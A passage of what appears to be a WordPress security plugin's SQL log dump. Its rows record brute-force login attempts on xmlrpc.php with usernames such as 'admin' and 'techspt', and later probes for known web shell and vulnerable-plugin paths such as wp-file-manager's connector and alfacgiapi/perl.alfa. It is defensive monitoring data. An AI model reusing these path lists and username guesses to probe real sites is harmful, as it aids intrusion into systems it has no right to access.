c.php',0,0,0),('151.80.88.201',2538625225,'',0,1679448627.0862,10,'MrvaQuZAkVT0xye7Ojs1tSmU','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('185.137.168.147',3112806547,'admin',0,1679448635.9172,152,'wQK94Hps2bzagOfSoRI6J3vF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.112.210.115',342938227,'jsjobs_jobseeker',0,1679448637.1217,152,'hL6dAUFQZJBtsoYIX9gfqK3C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'',0,1679448640.8108,71,'vkb8uT6YMmwFoRSNA1f2Xzig','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('151.80.88.201',2538625225,'',0,1679448641.9436,71,'kpL8Owc9mrvP3Cdx6HzjlJXh','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('51.178.146.199',867340999,'admin',0,1679452791.6633,152,'bklsPTtvnoqJGN8F5ZyahKA6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('150.60.232.16',2520573968,'admin',0,1679452795.8952,152,'cz1Z0Yx7VkLtdpaTqBgofmP3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('80.88.87.187',1347966907,'mediasoft',0,1679452801.0034,152,'glWsyaJSOvp69GIq870iudht','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.219.248.74',1759246410,'Admin',0,1679452805.2740,152,'V3k4s69UZ5Lit8MNwqTRdalE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.46.105.156',1496213916,'Admin',0,1679452805.4507,152,'z2ZwbT0sDpQWeKm63nBPhHtg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.112.210.115',342938227,'aaa',0,1679452822.9373,152,'EOf8vjAsGMzi9enoL5XrDxu3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.141.106.144',3113052816,'admin',0,1679452824.1827,152,'8NtB7PlaYXFZgMJzmyvfcobD','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('85.113.30.187',1433476795,'admin',0,1679456825.8617,152,'ErNjCLxugzUFGDqhRbwoacnH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.250.222.206',3355107022,'roottn',0,1679456825.8620,152,'5JSQKfL84mroFtMHWBcy0wE6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'admin',0,1679456830.1514,152,'2x7anr81PijW0GDI6tJCZKUo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.82.27.22',1733434134,'admin',0,1679456844.1595,152,'qJphx3nkLAUY21X5PGblTovt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.117.201.233',24496617,'admin',0,1679456849.3139,152,'NCPoV9BxvL28Sy7q0gKsXeMY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.68.11.215',860097495,'Admin',0,1679456861.4232,152,'iOuDl7R9n2NWoyUJhdc48BXb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.179.190.218',1739833050,'Admin',0,1679456863.1914,152,'0lO6mhc5CueEFsoDytUViqQa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.158.145.98',866029922,'admin',0,1679459148.5871,152,'FbxoyhKdCgPR5fpkY8US0lcT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.204.46.244',1540108020,'admin',0,1679459148.5875,152,'OTP5zIevnpwGBMaLCk92JcrR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.21.78.116',1091915380,'ureachus',0,1679459152.1921,152,'MWg2CYLqnUdmX7jS59Iwa4DT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'admin',0,1679459159.8776,152,'P6ZiYCDN49GfrUoH2lqRX7xn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'admin',0,1679459160.4602,152,'wGzeUXdyCbI05HFKhBi2flDJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'admin',0,1679459166.4677,152,'fxkrUsDaWHl9pLhdvFMwnTAC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'admin',0,1679459169.8414,152,'nkytghNef9v3pPqzbwCQ4doM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'admin',0,1679459175.4298,152,'clkabdWF4pKGvPA3JurBCHMI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'admin',0,1679461581.0318,152,'6aKNDkr2hTEbfdQ4CmZpsIBH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'admin',0,1679461581.5503,152,'HhK4nMfyYue9617IUs8lQDWZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.102.77.202',577129930,'jannat',0,1679461594.8460,152,'BZnVrmTMW3i8ovKQHcEqUjSJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.251.20.250',2499482874,'admin',0,1679461597.7435,152,'NB42pHTfkSx5FZzdbCs0vge3','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.102.77.202',577129930,'admin',0,1679461602.7858,152,'dIaVLJCbFM2u6YOt8QKlB9EP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.102.77.202',577129930,'',0,1679461602.7891,10,'dIaVLJCbFM2u6YOt8QKlB9EP','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('51.210.156.16',869440528,'Admin',0,1679461605.6933,152,'sb1GOdtBTXn3K7RuW9MA0e42','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'Admin',0,1679461614.2039,152,'fytE6OCTSwrdZ9gmenvX8z1G','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'',0,1679461614.2056,10,'fytE6OCTSwrdZ9gmenvX8z1G','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('184.168.119.63',3098048319,'admin',0,1679462489.2466,152,'FVBJlyRLPMA2umbOG3WKdcDs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'',0,1679462489.2488,10,'FVBJlyRLPMA2umbOG3WKdcDs','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('146.196.108.94',2462346334,'admin',0,1679462494.3149,152,'609dDC3bToQSqZVxspJzcYtH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.76.223.150',760012694,'admin',0,1679462499.3622,152,'aUWFHIqXuB92kpJt7MlKLiTy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('39.97.98.38',660693542,'admin',0,1679462503.9709,152,'dqyeCYLw4QHhApxsnbmTvot1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.204.46.244',1540108020,'Admin',0,1679462507.7598,152,'GFk6MXrq4I237UtiWYsERnSu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'gestore',0,1679462509.6478,152,'xRDT0ju5nora8QYGvUMNB3VO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'guest',0,1679463070.0267,152,'pPHtuhJDBr7IqsXvgbENW2CV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.112.210.115',342938227,'admin',0,1679463073.2519,152,'sgeztRdpw4ADP8m1ciBCNqb6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.38.86.87',3324401239,'admin',0,1679463081.9649,152,'fMQL2n3yFHVzPo96cZGwKkWO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.113.188.151',1114750103,'admin',0,1679463084.0723,152,'dXKwhDzAoYIrUPFakVQWOujL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('177.52.160.19',2973016083,'admin',0,1679463088.3621,152,'g8XCZKr3hsBO6o9iEDGpnlce','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.114.98.248',2809291512,'Admin',0,1679463089.3596,152,'ZxlgARBbPp761TaJUYNEX8yH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.102.77.202',577129930,'',0,1679463090.0798,71,'LEBObTranRHjiFpNmqXc8Vez','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('91.239.206.128',1542442624,'Admin',0,1679463094.8862,152,'SAI5DjEmyhts6wkGYCcLe3q7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679463094.8900,10,'SAI5DjEmyhts6wkGYCcLe3q7','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('68.178.228.73',1152574537,'admin',0,1679464095.0321,152,'kILyeh9v6xnFVS5u7rNJY4Xo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'AdMiN',0,1679464095.7457,152,'A3gbTnFt6oievV5KGLWsIyYc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.165.31.185',3114606521,'admin',0,1679464096.6825,152,'pSncDWEIt0dkw2U3xV4fezRL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'admin',0,1679464104.2483,152,'r0O9lCBSmhKaubNV6csDQdTg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'',0,1679464104.2512,10,'r0O9lCBSmhKaubNV6csDQdTg','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('39.97.98.38',660693542,'Admin',0,1679464107.6175,152,'qN4bhea6LpnJZtr07RH3PWyf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('39.97.98.38',660693542,'',0,1679464107.6195,10,'qN4bhea6LpnJZtr07RH3PWyf','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('185.182.57.9',3115727113,'Admin',0,1679464111.6927,152,'a0d1fmXgA24nDbiEUOQH6uK8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.82.27.22',1733434134,'Admin',0,1679464117.2195,152,'SJZRBHgpxank3hIfDWbOAC8K','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'Admin',0,1679464131.0073,152,'74OINqpjBd5Ry06sStxPceF8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.210.156.16',869440528,'',0,1679464973.9859,71,'WcOa7ARMHodTy3rXuPCJjkhe','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('39.97.98.38',660693542,'',0,1679464976.1549,71,'0ZzyHiwhxYq2EGtf8CskaU5B','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('119.59.96.60',2000379964,'Admin',0,1679464979.5596,152,'cC1DugFBJpME3mkGNUWQxKRS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'Admin',0,1679464979.7736,152,'PCq5hjM3YvFnQsp2ZBoyeDdm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('151.80.88.201',2538625225,'',0,1679464979.7758,10,'PCq5hjM3YvFnQsp2ZBoyeDdm','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('162.0.232.58',2717968442,'wwwadm',0,1679464984.5263,152,'C5gV2xX317adFsofGIQRjYbJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679464990.4662,71,'dLIkm7qTPGBwFfQWjyE2YRbK','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('159.69.234.174',2672159406,'',0,1679464991.0439,71,'udm3zwNhHb8Gxa5enET2gf6Q','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('151.80.88.201',2538625225,'',0,1679464993.5927,71,'kEBNg5lV8WeqDMjfPxmGRu6L','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('41.72.149.125',692622717,'demo',0,1679464996.0410,152,'d8XskR0LlxBp3Kmiurz2TNPV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'admin',0,1679464996.3701,152,'mnZlKJILp9S2cg6z7MdHroFh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.154.184.56',1738192952,'quantri',0,1679465310.5355,152,'PVS3oJNYsmaKZ2qrp68MIkQd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.102.77.202',577129930,'admin',0,1679465320.0105,152,'a0bkszmhHY64RgZUytEG2fc8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('167.114.98.248',2809291512,'admin',0,1679465325.1976,152,'jnlf5AB09C3YuvrxNX4KVZgQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'admin',0,1679465333.5257,152,'37fXWQ6qJe1LgCRo9tmPFvzE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'admin',0,1679465337.3560,152,'ZgKFkVbe5qasARIQd6x0EfwW','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'',0,1679465337.3578,10,'ZgKFkVbe5qasARIQd6x0EfwW','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('200.63.99.32',3359597344,'admin',0,1679465345.5690,152,'TlK5EpPA9kuHzOt3U8v7WYVS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.250.222.206',3355107022,'admin',0,1679465872.3890,152,'xNAwFQoqYIzhu4e2Xf1btdaH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.89.98.142',861495950,'admin',0,1679465884.5933,152,'y1DRhiN5HGLndc0Fv2bKUVIE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('135.181.136.149',2276821141,'admin',0,1679465896.9919,152,'zvd39V0DNmCHnkYPa8WAZpwO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'johnmiller83',0,1679466593.6900,152,'l9d07pe5xtYBFoaZVI6fRXQc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.119.63',3098048319,'Admin',0,1679466594.3518,152,'dJ5jb1tF3LRPZIxClq2D7kK9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('107.180.109.52',1806986548,'Admin',0,1679466597.7677,152,'EwJV46m3eKPsiW1vyuhSFoB7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('80.88.87.187',1347966907,'dexter',0,1679466598.4909,152,'dDpYAyUvmgV0nEMzwNWSrjLu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.240',3115727088,'jsjobs_employer',0,1679466619.5978,152,'iUQZflCyN2BDt1uRKw8nhkq6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679466619.9396,71,'2Ykbiger1ZPfJAswIDSmca7n','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('150.60.232.16',2520573968,'Admin',0,1679466751.1120,152,'FPtc943y6Hf2WdmEu71XvjNC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('80.88.87.187',1347966907,'rofry',0,1679466759.0405,152,'qECLbWMkv4BPGYcxoXwryH7A','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('80.88.87.187',1347966907,'',0,1679466759.0424,10,'qECLbWMkv4BPGYcxoXwryH7A','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('80.88.87.187',1347966907,'',0,1679466760.9989,71,'anUDdvyg07pmW5bJXcZklhti','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('43.135.100.126',730293374,'admin',0,1679466767.2217,152,'6XDaMHy3QjCPhd1KnASkt7E9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('77.68.64.24',1296318488,'admin',0,1679466783.8519,152,'7vKp9NGaV06qxmcMPEl1RzH2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.211.210',861656018,'',0,1679466787.1000,71,'YVMayr4Po5OstXfgAGH01hEv','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('80.88.87.187',1347966907,'',0,1679466789.7907,71,'vbh2Qd5kDcMRHxNE7BXrqiyj','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('184.168.101.66',3098043714,'administrator',0,1679466805.1272,152,'YEBtinjkxWh69mMFJ5luZrVd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.65.72.143',2671855759,'admin',0,1679466819.3732,152,'vTwoYWFGZhkz8Jc91eRUQjSA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'',0,1679467014.4439,71,'Snd3cVxDtKaeTOu9LoUEY857','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('184.168.101.66',3098043714,'admin',0,1679467016.7639,152,'mqVX3IO7gUApbSd1BWhLT06C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.117.83.240',24466416,'admin',0,1679467016.7657,152,'aVUDExYrQkyBf9w64gIOKSjR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.101.66',3098043714,'',0,1679467016.7659,10,'mqVX3IO7gUApbSd1BWhLT06C','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('195.201.202.58',3284781626,'admin',0,1679467021.5211,152,'I9LDPrA0NvywfgmTBSikHjlU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'',0,1679467022.4016,71,'feFRtPhsunx4YCoSIlqDKM60','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('159.69.234.174',2672159406,'',0,1679467027.7267,71,'ail93pqkBzHCeKV7xN52F8Po','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('91.239.206.128',1542442624,'Admin',0,1679467034.0210,152,'SfFJU1t8NeBKZEO5v0qPsClM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.234.174',2672159406,'',0,1679467084.5254,71,'bsNSQ2K7RC9cEAOWifqY3Lw4','','13|0|0|0|cmdev-site1.com/xmlrpc.php',0,13,0),('91.239.206.128',1542442624,'Admin',0,1679467116.0841,152,'3hcGYa0XMdsDx6NEkiV9oIPg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.239.206.128',1542442624,'',0,1679467116.0872,10,'3hcGYa0XMdsDx6NEkiV9oIPg','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('138.36.236.53',2317675573,'test',0,1679467129.5969,152,'PaYjSUwhHTtZNrORLMA2G3b5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',0,1679495952.5657,7,'7b1UjI6TCMGSyJ4hKDHon5uO','','40|0|0|0|cmdev-site1.com/wp-admin/admin-ajax.php',0,40,0),('67.198.116.43',1137079339,'',3,1679509380.2255,22,'V0myBXh7pk2iZ8TKJFNY15du','','0|0|0|0|cmdev-site1.com/the-wild-hunt/',0,0,3),('67.198.116.43',1137079339,'Melissa',3,1679509380.2294,5,'V0myBXh7pk2iZ8TKJFNY15du','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('5.78.85.72',89019720,'',0,1679525106.6394,55,'jAxn4vywWQKcZCubIUEH7oGN','','19|0|0|0|cmdev-site1.com/wp-content/plugins/ccx/index.php',0,19,0),('5.78.85.72',89019720,'',0,1679525109.5227,55,'YsGtwLjX1oJ9kHDaFSCmEIdl','','19|0|0|0|cmdev-site1.com/ccx/index.php',0,19,0),('5.78.85.72',89019720,'',0,1679525109.5249,10,'YsGtwLjX1oJ9kHDaFSCmEIdl','','707|0|0|0|cmdev-site1.com/ccx/index.php',0,707,0),('5.78.85.72',89019720,'',0,1679525111.3457,55,'QkKgIzOads28b6lCFi4MevrB','','19|0|0|0|cmdev-site1.com/wp-content/plugins/ccx/index.php',0,19,0),('5.78.85.72',89019720,'',0,1679525113.8668,55,'rz3Qw4tNUEVC5gAjWJ1KyMbq','','19|0|0|0|cmdev-site1.com/wp-content/themes/ccx/index.php',0,19,0),('60.245.60.102',1022704742,'',0,1679593668.4485,55,'OoLe2FRmnDdt0SZfupE4yqUP','','19|0|0|0|cmdev-site1.com/wp-admin/js/index.php',0,19,0),('60.245.60.102',1022704742,'',0,1679593686.6733,55,'MLGJaPhjC2ZVtpQSBWkylU0e','','19|0|0|0|cmdev-site1.com/wp-admin/css/css/index.php',0,19,0),('60.245.60.102',1022704742,'',0,1679593686.6751,10,'MLGJaPhjC2ZVtpQSBWkylU0e','','707|0|0|0|cmdev-site1.com/wp-admin/css/css/index.php',0,707,0),('60.245.60.102',1022704742,'',0,1679593737.6932,100,'fRyjBJo0AaHQ6XSDKp3iO41d','','13|0|0|0|cmdev-site1.com/wp-admin/js/js/index.php',0,13,0),('60.245.60.102',1022704742,'',0,1679593751.2416,100,'37D9qnSxy4FIAjdfkNutCga1','','13|0|0|0|cmdev-site1.com/wp-admin/js/js/js/index.php',0,13,0),('60.245.60.102',1022704742,'',0,1679593804.7040,100,'XIuQbrt09l5CSU3K14sBi6ov','','13|0|0|0|cmdev-site1.com/wp-admin/css/css/css/index.php',0,13,0),('147.78.47.249',2471374841,'',0,1679599063.8484,55,'W3KfzUmShiBq1YxRFe8lCODj','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('194.38.23.179',3257276339,'',0,1679603300.2696,55,'3qymzQlxNBcCSJM57fHseOo9','','19|0|0|0|cmdev-site1.com/js/_system/jQuery-File-Upload/server/php/index.php',0,19,0),('108.61.203.71',1815989063,'',0,1679706461.0487,55,'S4yLZucfsAFpMOnaYT92wI6P','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('108.61.203.71',1815989063,'',0,1679706461.0520,55,'2oDqHAPUZQCcnSINdRJ1xWO4','','19|0|0|0|cmdev-site1.com/wp-plain.php',0,19,0),('108.61.203.71',1815989063,'',0,1679706461.0619,10,'2oDqHAPUZQCcnSINdRJ1xWO4','','707|0|0|0|cmdev-site1.com/wp-plain.php',0,707,0),('108.61.203.71',1815989063,'',0,1679706464.5381,18,'7DHBQKLTnhZop4NOEfibJ2Fg','','13|0|0|0|cmdev-site1.com/wp-plain.php',0,13,0),('108.61.203.71',1815989063,'',0,1679706464.5656,100,'iDnjIku8LC34rASzmhxq9gTU','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('108.61.203.71',1815989063,'',0,1679706465.3394,100,'kDTiS5HJ8jecY1hZ7OIVEW0a','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php',0,13,0),('108.61.203.71',1815989063,'',0,1679706465.6535,18,'1ig0qeXNVvHmj8DOGkYpPh4Z','','13|0|0|0|cmdev-site1.com/alfacgiapi/perl.alfa',0,13,0),('108.61.203.71',1815989063,'',0,1679706466.3113,100,'Hqu0ic8kPReAXTKaFDZtEB72','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php',0,13,0),('108.61.203.71',1815989063,'',0,1679706467.4420,100,'SkUMPhTrFR4p8zitIX7D1Ve3','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected',0,13,0),('108.61.203.71',1815989063,'',0,1679706468.5714,100,'6UoikIBOp9ADqbh3RmtSdKZg','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected',0,13,0),('185.233.237.135',3119115655,'',0,1679735106.7717,55,'7ucpHFTOmZqsYgEG6ztyBCPD','','19|0|0|0|cmdev-site1.com/style.php',0,19,0),('185.233.237.135',3119115655,'',0,1679735106.7719,55,'Yr0uOgy9QICj4tVnG1z7M6hB','','19|0|0|0|cmdev-site1.com/wp-admin/style.php',0,19,0),('185.233.237.135',3119115655,'',0,1679735106.7847,10,'7ucpHFTOmZqsYgEG6ztyBCPD','','707|0|0|0|cmdev-site1.com/style.php',0,707,0),('194.38.23.179',3257276339,'',0,1679740303.6142,55,'pIRO4tmY2sHWkXZbrqNJzSy1','','19|0|0|0|cmdev-site1.com/server/php/index.php',0,19,0),('177.125.60.21',2977774613,'techspt',0,1679752005.2918,152,'KOHFedEvxpqrXuzbTVhJaD28','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'techspt',0,1679752006.3641,152,'ZhRfL29mIlOsTFKW3uaAdJpQ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('164.92.115.99',2757522275,'techspt',0,1679752006.4640,152,'HOuaKh7fM51kN0gtbPs9E4ld','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('69.174.53.190',1169044926,'techspt',0,1679752016.4582,152,'j5WyP7NeCGdAhaxSckOVF9p1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'techspt',0,1679752016.6764,152,'duPvTz2Me1jr9WFYlUwVHanq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.64',1109230656,'',0,1679752016.6799,10,'duPvTz2Me1jr9WFYlUwVHanq','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('202.61.232.172',3393054892,'techspt',0,1679752017.0807,152,'SXUDMdtiqgnawkWxZJp240oI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679752020.2882,152,'MZ5kUFHlAvrPjKgzWDOb0RcB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.244.46',1152578606,'techspt',0,1679752028.0925,152,'0V6SDFwW2RsH9g8Tnlm5LbQ7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.165.86.170',1386567338,'techspt',0,1679752031.6858,152,'mI18H03hWsOQVYUcbdxXZNBv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.64.25.22',759175446,'techspt',0,1679752059.7760,152,'dgJqwaobXPhr8O3kuDsG64MT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.210.217.51',148035891,'techspt',0,1679758408.7990,152,'2YDNrFcSvoAWwGPlhnOR4gM7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.146.149',2694419093,'techspt',0,1679758408.8011,152,'k1OFPVNRxLe7gAq08blXsoHE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.6.139.121',3104213881,'techspt',0,1679758409.5619,152,'SzIcGoH7ME9srWjgixu1nJ4C','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.97.170.79',627157583,'techspt',0,1679759001.8545,152,'HIPrEdWGfyhYR14w6TcMC3UN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('162.253.54.78',2734503502,'techspt',0,1679759001.8556,152,'iLXoujhsE4BbtxZYQSg1Jqky','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.56.34',3115726882,'techspt',0,1679759003.3574,152,'HStmN945xvREfIAsCBneLc1W','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('188.166.86.232',3165017832,'techspt',0,1679759010.3102,152,'jrXeOu0UwycikmW2A7dC8IxK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.91.29.218',861609434,'techspt',0,1679759012.1805,152,'IB9drJFbYhZXsSw1pTeWyACU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',3,1679759715.5077,5,'QNHJmMVDIw2o5FlT1aKvWGsd','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('194.243.52.182',3270718646,'techspt',0,1679762573.4528,152,'VMsZfiFrzH4IkxDUvSRKa2bq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('108.170.11.130',1823083394,'techspt',0,1679762573.6879,152,'4zTgQZleJM89jaqW6iYtCbnO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.140.92',1503890524,'techspt',0,1679762574.2890,152,'P40ZJtD8cB63wobrSdmylUqx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('69.174.53.190',1169044926,'techspt',0,1679762583.6217,152,'bt8WQrkgBSp4CZUT3NHl7MDc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('54.195.75.99',918768483,'techspt',0,1679762585.7591,152,'TndoKzaeSfMicyZjHLC2kp4O','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.153.68.100',1738097764,'techspt',0,1679762595.3737,152,'CiKUgjsH8vMnPJNZwAGmFhuf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.9',1152553225,'techspt',0,1679762595.8705,152,'QiXLtuJOc2BM1H5W6aeTZsfA','','0|0|0|0|cm